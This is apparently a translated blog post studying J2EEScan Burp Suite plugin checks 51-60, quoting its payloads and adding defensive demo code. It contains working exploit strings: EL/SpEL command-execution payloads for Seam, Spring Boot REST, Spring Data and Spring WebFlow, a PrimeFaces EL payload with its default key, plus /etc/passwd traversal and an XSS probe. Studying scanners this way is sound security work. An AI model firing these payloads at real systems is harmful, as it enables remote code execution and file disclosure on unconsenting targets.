【BurpSuite】Plugin Development Study: J2EEScan (Part 2) - Active Scans (51-60)

Preface

This is the tenth installment of the plugin development study series. Earlier articles:

【BurpSuite】Plugin Development Study: Log4shell
【BurpSuite】Plugin Development Study: Software Vulnerability Scanner
【BurpSuite】Plugin Development Study: dotnet-Beautifier
【BurpSuite】Plugin Development Study: active-scan-plus-plus
【BurpSuite】Plugin Development Study: J2EEScan (Part 1) - Passive Scans
【BurpSuite】Plugin Development Study: J2EEScan (Part 2) - Active Scans (1-10)
【BurpSuite】Plugin Development Study: J2EEScan (Part 2) - Active Scans (11-20)
【BurpSuite】Plugin Development Study: J2EEScan (Part 2) - Active Scans (21-30)
【BurpSuite】Plugin Development Study: J2EEScan (Part 2) - Active Scans (31-40)
【BurpSuite】Plugin Development Study: J2EEScan (Part 2) - Active Scans (41-50)

Analysis

【51】PivotalSpringTraversal CVE-2014-3625

Paths:

    private static final List<String> staticURLFolders = Arrays.asList(
            "/resources/",
            "/files/",
            "/upload/",
            "/static/",
            "/content/",
            "/html/",
            "/deploy/"
    );

First it checks whether the actual request path contains any of the folders above:

    for (String staticResourceFolder : staticURLFolders) {
        if (currentPath.contains(staticResourceFolder)) {
            // ... mutate and send the request (next snippet)
        }
    }

Then it performs a replacement on the original HTTP request:

    String mutatedHTTPRequest = mutator(HTTPRequest, staticResourceFolder, staticResourceFolder + INJ);

The replacement payload:

    private static final String INJ = "file:/etc/passwd";

The mutator function is just a regex find-and-replace:

    private String mutator(String httpRequest, String staticResourceFolder, String payload) {
        return httpRequest.replaceFirst(staticResourceFolder + ".* ", payload + " ");
    }
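The following is an added example, not J2EEScan code. It reproduces the plugin's mutator on a constructed request to show what the greedy ".* " actually swaps (everything from the folder up to the last space on the request line, i.e. just before the HTTP version token), and pairs it with a defender-side rule that flags a URL scheme such as "file:" appearing inside a static-resource path. The rule, its regex and the name looksLikeResourceUrlInjection are my own assumptions for a WAF or log-pipeline check; they are not Spring's fix, which lives in the framework's resource handler.

```java
import java.util.Arrays;
import java.util.List;
import java.util.regex.Pattern;

// Added example (not J2EEScan code): reproduces the mutator's regex replace on a
// constructed request and shows a detection rule a defender could run on request lines.
public class ResourceUrlMutationDemo {

    // Same folder list and payload as the plugin's CVE-2014-3625 check.
    static final List<String> STATIC_URL_FOLDERS = Arrays.asList(
            "/resources/", "/files/", "/upload/", "/static/", "/content/", "/html/", "/deploy/");
    static final String INJ = "file:/etc/passwd";

    // The plugin's mutator. "." does not cross line terminators, so the greedy ".* "
    // stops at the last space on the request line (before "HTTP/1.1"); the whole
    // original path after the folder is therefore replaced by the payload.
    static String mutator(String httpRequest, String staticResourceFolder, String payload) {
        return httpRequest.replaceFirst(staticResourceFolder + ".* ", payload + " ");
    }

    // Hypothetical detection rule (assumed name and regex): a resource path under one of
    // the static folders that embeds a URL scheme ("file:", "http:", ...) is suspicious.
    static final Pattern SCHEME_IN_RESOURCE_PATH = Pattern.compile(
            "(?i)/(resources|files|upload|static|content|html|deploy)/[^ ?]*\\b[a-z][a-z0-9+.-]*:");

    static boolean looksLikeResourceUrlInjection(String requestLine) {
        return SCHEME_IN_RESOURCE_PATH.matcher(requestLine).find();
    }

    public static void main(String[] args) {
        // Constructed sample request, not captured traffic.
        String request = "GET /static/css/site.css HTTP/1.1\r\nHost: app.example.test\r\n\r\n";
        String requestLine = request.split("\r\n", 2)[0];
        System.out.println("benign:  " + requestLine + " -> " + looksLikeResourceUrlInjection(requestLine));

        for (String folder : STATIC_URL_FOLDERS) {
            if (requestLine.contains(folder)) {
                String mutated = mutator(request, folder, folder + INJ);
                String mutatedLine = mutated.split("\r\n", 2)[0];
                // Request line becomes "GET /static/file:/etc/passwd HTTP/1.1" and is flagged.
                System.out.println("mutated: " + mutatedLine + " -> " + looksLikeResourceUrlInjection(mutatedLine));
            }
        }
    }
}
```

The rule only inspects the request line; the page's mutator also only ever touches the first match, which in a normal request is that same line.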

【52】PrimeFacesELInjection - CVE-2017-1000486

Payloads:

    PAYLOADS.add("/javax.faces.resource/j2eescan.xhtml?pfdrt=sc&ln=primefaces&pfdrid=" + PrimeFacesELInjection.INJ_TEST);
    PAYLOADS.add("/javax.faces.resource/j2eescan.jsf?pfdrt=sc&ln=primefaces&pfdrid=" + PrimeFacesELInjection.INJ_TEST);

    private static final String INJ_TEST = "uMKljPgnOTVxmOB%2bH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVYjEh7SE3F4WmfKUle6apy2QGwABuVlzurPsgFxYP0G3b1dDqmgmxMw%3d%3d";

If the response matches, the target is vulnerable:

    if (header.contains("J2EESCANPRIME")) {

This is an RCE. The key is the pfdrid parameter, which carries an encrypted EL expression. The payload here is the encryption of the expression below, which is why the check looks at the response headers:

    "${facesContext.getExternalContext().setResponseHeader(\\\"J2EESCANPRIME\\\",\\\"primefaces\\\")}"

The default password is:

    Default = primefaces

For the exploitation tool, see:

    https://github.com/pimps/CVE-2017-1000486

【53】RESTAPISwagger

Issues related to REST API Swagger. Relevant paths:

    private static final List<String> SWAGGER_APIS = Arrays.asList(
            "/swagger-ui.html",
            "/swagger/swagger-ui.html",
            "/api/swagger-ui.html",
            "/swagger/index.html",
            "/%20/swagger-ui.html"
    );

We see this one quite often; from it you can recover the structure of some server-side APIs. Match:

    private static final byte[] GREP_STRING = "Swagge".getBytes();
【54】Seam2RCE(Jboss) - CVE-2010-1871

EL/template injection in JBoss Seam 2. Payload:

    byte[] rawSimpleRequestSeam = helpers.addParameter(rawRequest,
            helpers.buildParameter("actionOutcome",
                    "/pwd.xhtml?user%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethod('getRuntime').invoke(expressions.getClass().forName('java.lang.Runtime')).exec('hostname')}", IParameter.PARAM_URL)
    );

Is the match on the hostname? Not exactly: the grep strings are the class names of the Process object that exec() returns, whose default toString() ends up in the response (UNIXProcess on Linux, ProcessImpl on Windows):

    private static final byte[] GREP_STRING_L = "java.lang.UNIXProcess".getBytes();
    private static final byte[] GREP_STRING_W = "java.lang.ProcessImpl".getBytes();

The payload above fetches the method directly by reflection; the one below iterates over getDeclaredMethods() by index, which feels a bit like a bypass:

    byte[] rawRequestSeam = helpers.addParameter(rawRequest,
            helpers.buildParameter("actionOutcome",
                    "/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[" + i + "].invoke(expressions.getClass().forName('java.lang.Runtime')).exec('hostname')}}", IParameter.PARAM_URL)
    );

The match is the same.
【55】SnoopResource

This looks like XSS via a GET request. Paths:

    private static final List<String> SNOOP_PATHS = Arrays.asList(
            "/snoop.jsp?" + XSS_PAYLOAD,
            "/examples/jsp/snp/snoop.jsp?" + XSS_PAYLOAD,
            "/examples/servlet/SnoopServlet?" + XSS_PAYLOAD,
            "/servlet/SnoopServlet?" + XSS_PAYLOAD,
            "/j2ee/servlet/SnoopServlet?" + XSS_PAYLOAD,
            "/jsp-examples/snp/snoop.jsp?" + XSS_PAYLOAD
    );

The payload uses an h1 tag:

    private static final String XSS_PAYLOAD = "<h1>j2eescan";

Interestingly, if the match is

    private static final byte[] GREP_STRING = "Path translated".getBytes();

it is reported as low severity; if it is

    "<h1>j2eescan"

it is reported as medium severity.
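As an added example (not J2EEScan code, and not the real snoop.jsp), the two-level decision above is reproduced and run against two constructed stand-ins for a snoop page: one that echoes the query string raw, and one that HTML-encodes it first. The page contents, the htmlEscape helper and the classify function are my own; the severity rule and the two grep strings are the plugin's.

```java
// Added example (not J2EEScan code): the plugin's two-level Snoop match, applied to a
// constructed echoing page before and after output encoding is added.
public class SnoopSeverityDemo {

    static final String XSS_PAYLOAD = "<h1>j2eescan";
    static final String GREP_STRING = "Path translated";

    enum Severity { NONE, LOW, MEDIUM }

    // Same decision the plugin makes: an unencoded reflection of the payload is
    // medium; a snoop page that merely exists (prints "Path translated") is low.
    static Severity classify(String responseBody) {
        if (responseBody.contains(XSS_PAYLOAD)) return Severity.MEDIUM;
        if (responseBody.contains(GREP_STRING)) return Severity.LOW;
        return Severity.NONE;
    }

    // Minimal HTML text-node encoding (hypothetical helper; a real application should
    // use its framework's escaper or the OWASP Java Encoder).
    static String htmlEscape(String s) {
        StringBuilder out = new StringBuilder(s.length());
        for (char c : s.toCharArray()) {
            switch (c) {
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '&':  out.append("&amp;");  break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#39;");  break;
                default:   out.append(c);
            }
        }
        return out.toString();
    }

    // Constructed stand-in for a snoop page that echoes the query string raw.
    static String vulnerableSnoopPage(String queryString) {
        return "<html><body><pre>Path translated: /var/www\nQuery string: "
                + queryString + "</pre></body></html>";
    }

    // Same page with the query string encoded before it is written out.
    static String hardenedSnoopPage(String queryString) {
        return "<html><body><pre>Path translated: /var/www\nQuery string: "
                + htmlEscape(queryString) + "</pre></body></html>";
    }

    public static void main(String[] args) {
        System.out.println("vulnerable: " + classify(vulnerableSnoopPage(XSS_PAYLOAD))); // MEDIUM
        System.out.println("hardened:   " + classify(hardenedSnoopPage(XSS_PAYLOAD)));   // LOW
        System.out.println("no snoop:   " + classify("<html>404 Not Found</html>"));     // NONE
    }
}
```

The hardened page still triggers the low finding, which is the plugin's way of saying that a diagnostic page is exposed at all; removing the snoop resources from production is what clears that one.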
【56】SpringBootActuator

Iterate over the paths:

    private static final List<String> SPRINGBOOT_ACTUATOR_PATHS = Arrays.asList(
            "/health",
            "/manager/health",
            "/actuator",
            "/actuator/jolokia/list",
            "/jolokia/list",
            "/env"
    );

Match on these:

    private static final List<byte[]> GREP_STRINGS = Arrays.asList(
            "{\"status\":\"UP\"}".getBytes(),
            "{\"_links\":".getBytes(),
            "org.spring".getBytes(),
            "java.vendor".getBytes()
    );

Spring Boot memory leakage, I'd say; I've previously seen this page leak a large number of user tokens that allowed direct account takeover, so it isn't really the "low" he describes and needs to be checked in practice.
【57】SpringBootRestRCE cve-2017-8046

First it swaps POST for PATCH (so GET does not work here?):

    headers.set(0, firstHeader.replaceFirst("POST ", "PATCH "));

Then it changes the Content-Type and Accept headers:

    List<String> headersWithContentTypePatch = HTTPParser.addOrUpdateHeader(headers, "Content-type", "application/json-patch+json");
    List<String> headersWithContentTypePatchAndAccept = HTTPParser.addOrUpdateHeader(headersWithContentTypePatch, "Accept", "*/*");

Send the payload:

    String finalPayload = "[{ \"op\" : \"replace\", \"path\" : \"T(org.springframework.util.StreamUtils).copy(T(java.lang.Runtime).getRuntime().exec(" + payload + ").getInputStream(), T(org.springframework.web.context.request.RequestContextHolder).currentRequestAttributes().getResponse().getOutputStream()).x\", \"value\" : \"j2eescan\" }]";

If there is no echo, the payload can use a ping to a DNS name for matching.
【58】SpringCloudConfigPathTraversal cve-2020-5410

(image: https://1000bd.com/contentImg/2023/11/09/104956565.png)

A 2020 bug. Directory traversal in Spring Cloud Config, fairly easy to construct. Payload:

    private static final List<String> SPRINGCLOUD_TRAVERSALS = Arrays.asList(
            "/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23"
    );

Just match on passwd.
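Why the payload is double-encoded (%252F rather than %2F) is worth seeing concretely. The following added example, which is my own code rather than J2EEScan's or Spring Cloud's, decodes the page's payload once and then until it stops changing, and contrasts a naive single-decode ".." check with one that decodes fully before inspecting path segments. The helper names fullyDecode, isTraversal and isTraversalSingleDecode are hypothetical; it assumes Java 10 or later for the URLDecoder.decode(String, Charset) overload.

```java
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;

// Added example (not J2EEScan or Spring Cloud code): shows why the CVE-2020-5410
// payload is double-encoded and why a defender-side path check must decode until
// the value is stable before looking for ".." segments.
public class DoubleEncodedTraversalDemo {

    // The plugin's payload, reproduced from the page.
    static final String PAYLOAD =
            "/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23";

    // Decode repeatedly until another pass changes nothing (bounded, so crafted input
    // cannot loop forever). One decode of "%252F" yields only "%2F".
    static String fullyDecode(String raw) {
        String current = raw;
        for (int i = 0; i < 5; i++) {
            String next = URLDecoder.decode(current, StandardCharsets.UTF_8);
            if (next.equals(current)) return current;
            current = next;
        }
        return current;
    }

    // Hypothetical check (assumed name): reject a path that, once fully decoded,
    // contains a ".." segment; a trailing fragment ("#", from %23) is ignored.
    static boolean isTraversal(String rawPath) {
        String decoded = fullyDecode(rawPath);
        int hash = decoded.indexOf('#');
        if (hash >= 0) decoded = decoded.substring(0, hash);
        for (String segment : decoded.split("/")) {
            if (segment.equals("..")) return true;
        }
        return false;
    }

    // The naive variant that decodes only once, for comparison.
    static boolean isTraversalSingleDecode(String rawPath) {
        String decoded = URLDecoder.decode(rawPath, StandardCharsets.UTF_8);
        for (String segment : decoded.split("/")) {
            if (segment.equals("..")) return true;
        }
        return false;
    }

    public static void main(String[] args) {
        String once = URLDecoder.decode(PAYLOAD, StandardCharsets.UTF_8);
        System.out.println("decoded once:  " + once);                 // still contains %2F, no "/" between the dots
        System.out.println("decoded fully: " + fullyDecode(PAYLOAD));  // /../../../../../../../../../../../etc/passwd#
        System.out.println("single-decode check:  " + isTraversalSingleDecode(PAYLOAD)); // false
        System.out.println("full-decode check:    " + isTraversal(PAYLOAD));             // true
        System.out.println("benign path:          " + isTraversal("/app/default/master")); // false
    }
}
```

After one decode the separators are still "%2F", so the only "/" in the string is the leading one and no segment equals ".."; only the fully decoded form exposes the traversal. Any filter or WAF rule that decodes once and then pattern-matches is blind to exactly this payload.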
【59】SpringDataCommonRCE cve-2018-1273

Reference: https://mp.weixin.qq.com/s?__biz=MzU0NzYzMzU0Mw==&mid=2247483666&idx=1&sn=91e3b2aab354c55e0677895c02fb068c

This is a SpEL expression injection vulnerability. The patch essentially replaces StandardEvaluationContext with SimpleEvaluationContext: StandardEvaluationContext is far too powerful, can execute arbitrary code, and gets abused by malicious users. SimpleEvaluationContext has much narrower privileges; it only supports some map-like structures, and the commonly used java.lang.Runtime and java.lang.ProcessBuilder are no longer reachable. See the SimpleEvaluationContext implementation for details.

(image: https://1000bd.com/contentImg/2023/11/09/104956512.png)

Payload:

    String injection = "[#this.getClass().forName(\"java.lang.Runtime\").getRuntime().exec(\"%s\")]=";

The replacement works like this:

    String updatedBody = requestBody.replace("=", finalPayload);

(image: https://1000bd.com/contentImg/2023/11/09/104956794.png)
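To make the StandardEvaluationContext versus SimpleEvaluationContext difference tangible, here is an added example that is not the Spring Data Commons patch itself. It assumes spring-expression on the classpath and uses the public SpEL API (SpelExpressionParser, StandardEvaluationContext, SimpleEvaluationContext.forReadOnlyDataBinding()). A plain property read succeeds under both contexts; a type reference via T(...), which is what the payload's Runtime and ProcessBuilder calls depend on, is refused by the simple context. The Form class, the evaluate helper and the benign expressions are constructed for the demo.

```java
import org.springframework.expression.EvaluationContext;
import org.springframework.expression.Expression;
import org.springframework.expression.ExpressionException;
import org.springframework.expression.spel.standard.SpelExpressionParser;
import org.springframework.expression.spel.support.SimpleEvaluationContext;
import org.springframework.expression.spel.support.StandardEvaluationContext;

// Added example (not the Spring Data Commons patch): assumes spring-expression on the
// classpath. Evaluates a data-binding expression and a type-reference expression under
// both contexts to show what SimpleEvaluationContext refuses.
public class SpelContextDemo {

    // Constructed root object standing in for a form-backing bean.
    public static class Form {
        private final String name = "alice";
        public String getName() { return name; }
    }

    // Evaluate one expression and report either its value or the rejection message.
    static String evaluate(String expression, EvaluationContext ctx) {
        try {
            Expression expr = new SpelExpressionParser().parseExpression(expression);
            return "ok: " + expr.getValue(ctx);
        } catch (ExpressionException e) {
            return "rejected: " + e.getMessage();
        }
    }

    public static void main(String[] args) {
        Form root = new Form();

        // The pre-patch context: full reflection, type references, constructors.
        EvaluationContext standard = new StandardEvaluationContext(root);

        // The post-patch context: read-only property access on the root object only.
        EvaluationContext simple = SimpleEvaluationContext.forReadOnlyDataBinding()
                .withRootObject(root)
                .build();

        // Benign data binding: works in both.
        String binding = "name";

        // A harmless type reference stands in for the payload's T(java.lang.Runtime):
        // the point is that T(...) itself is not resolvable under the simple context.
        String typeRef = "T(java.lang.System).getProperty('java.version')";

        System.out.println("standard  " + binding + " -> " + evaluate(binding, standard));
        System.out.println("simple    " + binding + " -> " + evaluate(binding, simple));
        System.out.println("standard  " + typeRef + " -> " + evaluate(typeRef, standard));
        System.out.println("simple    " + typeRef + " -> " + evaluate(typeRef, simple));
    }
}
```

Under the simple context the last line reports a SpEL "type cannot be found" style rejection rather than a value: the context's type locator refuses every T(...) lookup, which is what takes java.lang.Runtime and java.lang.ProcessBuilder out of reach of data-binding expressions.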
【60】SpringWebFlowDataBindExpression CVE-2017-4971

Spring WebFlow 2.4.0 - 2.4.4. One payload does it all:

    String injection = "_(new java.lang.ProcessBuilder(\"bash\",\"-c\",\"ping -c 3 %s\")).start()";

(image: https://1000bd.com/contentImg/2023/11/09/104956763.png)
(image: https://1000bd.com/contentImg/2023/11/09/104956662.png, "triggered")

The trigger point is the form submission.
Original article: https://blog.csdn.net/xiru9972/article/details/126925868